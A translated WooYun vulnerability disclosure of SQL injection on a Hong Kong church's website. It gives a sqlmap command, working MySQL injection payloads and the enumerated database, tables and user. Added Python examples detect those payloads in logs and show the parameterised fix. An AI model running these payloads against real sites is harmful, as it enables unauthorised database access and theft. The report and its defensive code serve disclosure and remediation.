神刀安全网

Vulnerability title: SQL injection vulnerability in the website of 基督教香港崇真會新翠堂 (Tsung Tsin Mission of Hong Kong, Sun Chui Church) (Hong Kong region)

Vulnerability details

Disclosure status:

2016-01-30: Details sent to the vendor; awaiting the vendor's response
2016-02-01: Vendor has confirmed; details disclosed to the vendor only
2016-02-11: Details disclosed to core white hats and experts in related fields
2016-02-21: Details disclosed to regular white hats
2016-03-02: Details disclosed to intern white hats
2016-03-17: Details disclosed to the public

Brief description:

The website of 基督教香港崇真會新翠堂 (Tsung Tsin Mission of Hong Kong, Sun Chui Church) has an SQL injection vulnerability

Detailed description:

The Tsung Tsin Mission of Hong Kong (基督教香港崇真會) originates from the Basel Mission (巴色會), a missionary society from the Swiss city of Basel (Basel Evangelical Missionary Society), formed by members of the Reformed and Lutheran churches as a non-denominational international evangelical organisation. In 1847 the Basel Mission sent Rev Theodore Hamberg (韓山明牧師) and Rev Rudolph Lechler (黎力基牧師) to begin evangelical work in Hong Kong and along the Pearl River, East River and Mei River; in 1851 the first church was established on Hong Kong Island, serving mainly the Hakka community. In 1924 it was renamed Tsung Tsin Mission (崇真會), a name taken from 「崇拜真神、崇尚真道」 ("worship the true God, uphold the true Way"); in doctrine, church polity and liturgy the Mission retains the characteristics of both the Reformed and Lutheran traditions. Today the Mission has over twenty congregations, more than ten thousand members, over a dozen secondary and primary schools and kindergartens, and several elderly centres and integrated service centres.

Address: Room 105, 沙田崇真中學 (Shatin Tsung Tsin Secondary School), 1 Mei Tin Road, Tai Wai, Sha Tin

Telephone: 2699 3903

Email: scttc@**.**.**.**

Proof of vulnerability:

The injection point is http://**.**.**.**/?ref=department

Code:
sqlmap -u 'http://**.**.**.**/?ref=department' -v 1 --dbs --batch --random-agent                        [11:49:48]

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://**.**.**.**

[*] starting at: 15:31:57

[15:31:57] [INFO] fetched random HTTP User-Agent header from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/txt/user-agents.txt': Opera/9.24 (Windows NT 5.1; U; tr)
[15:31:57] [INFO] using '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/**.**.**.**/session' as session file
[15:31:57] [INFO] resuming injection data from session file
[15:31:57] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[15:31:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ref
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ref=activities' AND 8064=8064 AND 'wjzH'='wjzH&action=search

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: ref=activities' AND (SELECT 4464 FROM(SELECT COUNT(*),CONCAT(CHAR(58,101,97,121,58),(SELECT (CASE WHEN (4464=4464) THEN 1 ELSE 0 END)),CHAR(58,114,121,99,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'gJEs'='gJEs&action=search
---

[15:31:58] [INFO] the back-end DBMS is MySQL

web application technology: Apache
back-end DBMS: MySQL 5.0
[15:31:58] [INFO] fetching database names
[15:31:58] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/**.**.**.**/session': 2
[15:31:58] [INFO] the SQL query used returns 2 entries
[15:31:58] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/**.**.**.**/session': information_schema
[15:31:58] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/**.**.**.**/session': scttc_main
available databases [2]:
[*] information_schema
[*] scttc_main

[15:31:58] [INFO] Fetched data logged to text files under '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/**.**.**.**'

[*] shutting down at: 15:31:58

scttc_main has 17 tables

Code:
Database: scttc_main
[17 tables]
+----------------------+
| def_group_type |
| def_sharing_category |
| def_status |
| def_user_type |
| t_activities_detail |
| t_attachment |
| t_events_timetable |
| t_group |
| t_group_fellowship |
| t_group_worshipteam |
| t_menu |
| t_news |
| t_rundown |
| t_sharing |
| t_special_rules |
| t_user |
| t_worship_list |
+----------------------+

Database user

Code:
database management system users [1]:
[*] 'scttc'@'localhost'
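The two payload shapes sqlmap reported above (a quoted boolean tautology and a MySQL error-based subquery over information_schema) leave a recognisable trace in the web server's access log. The following detection script is an added example, not part of the original report or the site's code: it parses Apache combined-format lines, URL-decodes each query parameter and flags values that match rules derived only from those two payloads. The log lines are constructed for the example (the source IP, timestamps and sizes are made up), and the rule set is deliberately narrow rather than a general SQL-injection detector.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format lines (not taken from the report): a normal
# page request followed by requests carrying the two payloads sqlmap reported.
SAMPLE_LOG = """\
203.0.113.10 - - [30/Jan/2016:15:31:57 +0800] "GET /?ref=department HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [30/Jan/2016:15:31:57 +0800] "GET /?ref=activities%27%20AND%208064%3D8064%20AND%20%27wjzH%27%3D%27wjzH&action=search HTTP/1.1" 200 5120 "-" "Opera/9.24 (Windows NT 5.1; U; tr)"
203.0.113.10 - - [30/Jan/2016:15:31:58 +0800] "GET /?ref=activities%27%20AND%20(SELECT%204464%20FROM(SELECT%20COUNT(*)%2CCONCAT(CHAR(58%2C101%2C97%2C121%2C58)%2C(SELECT%20(CASE%20WHEN%20(4464%3D4464)%20THEN%201%20ELSE%200%20END))%2CCHAR(58%2C114%2C121%2C99%2C58)%2CFLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20%27gJEs%27%3D%27gJEs&action=search HTTP/1.1" 500 312 "-" "Opera/9.24 (Windows NT 5.1; U; tr)"
"""

# Apache "combined" log format: host ident user [time] "request" status size "referer" "agent"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Each rule is a name plus a pattern derived from the payload shapes in the
# report; the backreference catches the "N=N" tautology for any N.
RULES = [
    ("quote-and-tautology", re.compile(r"'\s*AND\s+(\d+)\s*=\s*\1\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I)),
    ("mysql-error-based", re.compile(r"FLOOR\s*\(\s*RAND\s*\(", re.I)),
]


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def classify_value(value):
    """Return the names of every rule the (already URL-decoded) value trips."""
    return [name for name, pat in RULES if pat.search(value)]


def scan_log(text):
    """Return one finding per request parameter that trips at least one rule."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        query = urlsplit(entry["target"]).query
        # parse_qsl percent-decodes values, so the rules see the SQL as the DBMS would.
        for param, value in parse_qsl(query, keep_blank_values=True):
            reasons = classify_value(value)
            if reasons:
                findings.append({
                    "ip": entry["ip"], "ts": entry["ts"], "status": entry["status"],
                    "param": param, "reasons": reasons,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} param={f['param']} status={f['status']} "
              f"reasons={','.join(f['reasons'])}")
```

Decoding before matching matters: the same payload can be sent with different percent-encodings, so rules applied to the raw request line would miss trivially re-encoded variants. The 500 status on the error-based request is a useful secondary signal because that technique relies on provoking a database error.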

Fix recommendation:

Fix the injection.

Copyright notice: when reposting, please credit the source: hellokuku@乌云 (WooYun)
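The report's proof shows the `ref` page selector being spliced into a query string. As an added example (not code from the report or from the church's website, whose server-side language is not stated), the following Python script models that defect against an in-memory SQLite table and places the corrected form beside it: the value is passed as a bound parameter, and additionally checked against an allow-list pattern before it reaches the database. The table `t_menu` and its columns are assumptions standing in for the real scttc_main schema, which the page does not show.

```python
import re
import sqlite3

# Constructed stand-in for the page selector table; the real scttc_main schema
# is not on the page, so the table and column names here are assumptions.
SAMPLE_ROWS = [
    ("department", "Departments"),
    ("activities", "Activities"),
    ("news", "News"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE t_menu (ref TEXT PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO t_menu VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_unsafe(conn, ref):
    """The defect class the report describes: the request value is spliced into
    the SQL text, so a quote inside it ends the literal and the remainder is
    parsed as SQL."""
    sql = "SELECT title FROM t_menu WHERE ref = '" + ref + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_bound(conn, ref):
    """Same query with the value passed as a bound parameter: the driver sends
    it as data, so it can never change the statement's structure."""
    rows = conn.execute("SELECT title FROM t_menu WHERE ref = ?", (ref,))
    return [row[0] for row in rows]


# A page selector only ever takes short lowercase identifiers; reject anything
# else before it reaches the database (defence in depth on top of binding).
REF_PATTERN = re.compile(r"[a-z_]{1,32}")


def lookup_safe(conn, ref):
    if REF_PATTERN.fullmatch(ref) is None:
        return []
    return lookup_bound(conn, ref)


# The boolean-based blind payload from the sqlmap output, plus the same string
# with the tautology made false, used only to show the oracle closing.
TRUE_PROBE = "activities' AND 8064=8064 AND 'wjzH'='wjzH"
FALSE_PROBE = "activities' AND 8064=8065 AND 'wjzH'='wjzH"

if __name__ == "__main__":
    conn = make_db()
    print("unsafe, true probe :", lookup_unsafe(conn, TRUE_PROBE))   # a row comes back
    print("unsafe, false probe:", lookup_unsafe(conn, FALSE_PROBE))  # nothing: the blind oracle
    print("bound,  true probe :", lookup_bound(conn, TRUE_PROBE))    # nothing: value is data
    print("safe,   department :", lookup_safe(conn, "department"))   # normal use still works
```

The unsafe variant answers differently for the true and false probes even though neither is a real page name, which is exactly the difference a boolean-based blind technique reads. With binding, both probes are compared as literal strings against the `ref` column and match nothing; the allow-list check on top rejects them before a query is issued at all.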
